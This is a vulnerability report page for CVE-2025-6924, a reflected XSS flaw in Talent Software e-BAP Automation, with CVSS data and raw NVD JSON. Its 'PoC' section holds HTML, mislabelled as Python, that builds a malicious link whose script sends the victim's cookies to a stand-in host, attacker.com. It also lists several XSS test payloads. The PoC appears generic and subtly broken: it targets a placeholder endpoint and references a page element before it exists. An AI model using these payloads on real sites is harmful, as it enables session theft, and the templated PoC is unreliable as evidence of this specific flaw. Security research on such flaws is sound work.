Security Vulnerability Report
中文
CVE-2025-6924 CVSS 5.4 MEDIUM

CVE-2025-6924

Published: 2025-12-09 16:18:39
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Talent Software e-BAP Automation allows Reflected XSS.This issue affects e-BAP Automation: before 42957.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Talent Software e-BAP Automation < 42957

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-6924 PoC: Reflected XSS in Talent Software e-BAP Automation --> <!-- Target: e-BAP Automation versions before 42957 --> <!-- Attack Vector: Malicious URL with embedded JavaScript --> <!DOCTYPE html> <html> <head> <title>CVE-2025-6924 PoC</title> </head> <body> <h2>CVE-2025-6924 - Reflected XSS PoC</h2> <p>Target: Talent Software e-BAP Automation</p> <p>Versions: Before 42957</p> <!-- Attack URL - Replace TARGET_URL with actual vulnerable endpoint --> <script> // Generate malicious XSS payload URL const targetBase = "http://TARGET_URL/e-bap"; const xssPayload = "<script>alert('XSS Vulnerability - CVE-2025-6924');document.location='https://attacker.com/steal?cookie='+document.cookie</script>"; const maliciousUrl = targetBase + "/endpoint?param=" + encodeURIComponent(xssPayload); // Display the attack URL document.getElementById('attack-url').innerHTML = '<a href="' + maliciousUrl + '" target="_blank">Malicious Link</a>'; // Log for testing console.log('Malicious URL:', maliciousUrl); </script> <p>Generated Attack URL:</p> <div id="attack-url"></div> <!-- Simple XSS test payloads --> <h3>Test Payloads:</h3> <ul> <li><code>&lt;script&gt;alert(document.domain)&lt;/script&gt;</code></li> <li><code>&lt;img src=x onerror=alert(1)&gt;</code></li> <li><code>&lt;svg onload=alert(document.cookie)&gt;</code></li> <li><code>"><script>alert('XSS')</script></code></li> </ul> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-6924", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:38.617", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Talent Software e-BAP Automation allows Reflected XSS.This issue affects e-BAP Automation: before 42957."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0434", "source": "[email protected]"}]}}